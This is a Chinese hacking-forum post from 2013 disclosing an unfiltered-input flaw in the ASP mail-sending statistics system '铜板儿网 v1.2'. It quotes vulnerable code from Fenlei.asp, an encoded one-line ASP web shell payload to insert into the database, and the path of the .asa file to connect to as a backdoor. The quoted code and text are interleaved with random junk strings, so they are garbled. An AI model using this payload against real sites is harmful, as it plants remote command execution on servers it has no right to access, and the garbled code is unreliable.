找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1880|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp ! q2 y+ h# ^) r# G4 A1 s6 {/ ?

9 E- t! M/ N9 A" sIF Request.QueryString("Action")="del" Then - N% e: v( q& T3 Q  M/ D$ J% K
ID=Request.QueryString("ID")
# |* `( G1 ]4 h9 rIF Countss ("tui","Fenlei",ID )<>0 then
1 s: P) {* R8 t' Q'略 1 p- t2 m' N9 t) _6 q0 O
IF Request.QueryString("Action")="Add" Then 9 _2 f( J8 p- S4 w' Y8 @6 E+ G
Tname=Request.Form("Typename")
( m: \: `' W+ TSet Rs=Server.CreateObject("adodb.Recordset")
' ?" l# S# U$ TSql="Select * From Fenlei Order by id Desc "
( [8 \" i4 z, cRs.Open Sql,Conn,1,3
% |$ t  k6 @( l8 o# nRs.Addnew 4 O. d5 \' G3 ]: q1 A
Rs("Typename")=Tname
5 p; l6 O. ]9 v0 j% ]" s'略
4 g; X# @8 W; l1 w9 q: zSet Rs=Server.CreateObject("adodb.Recordset")
$ e4 ~' w, n1 ZSql="Select * From Fenlei Order by id Desc " / S/ y" w+ T9 M& p3 ^2 {$ E8 Z
Rs.Open Sql,Conn,1,1
) ]6 Q% @9 ]) W; a& t% R'略
2 b6 K' d; R# T+ q%>9 i4 S+ D. O4 W. D
6 q3 y4 r! G  ?! X  k; U/ N
. E: J# _9 j  ]/ ?. t7 i& ^% e

( Y! Z2 ?: j% h没有过滤,直接写入数据库。
! M; }3 [% q6 I" k+ H9 ^
& r* y& m7 M' `  K5 y% @' m4 L# K利用方法:
* Z* P7 Q8 P0 |8 {! H # k) L- ]* O0 l- W& V- @( r
插入:┼攠數畣整爠煥敵瑳∨≡┩>$ d% B. j1 m# _. {9 n% i) W9 B
, Q* [: g/ c/ d9 L9 B

  c1 P% k, m9 f9 j. i( l连接: http://www.xxx.com/###tongbaner.asa 6 g- U( ]/ Y7 `  j
'默认安装文件:
3 ?2 t5 T1 Y  K* z'install.asp( I2 l  l4 t1 {. K! c+ M! l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表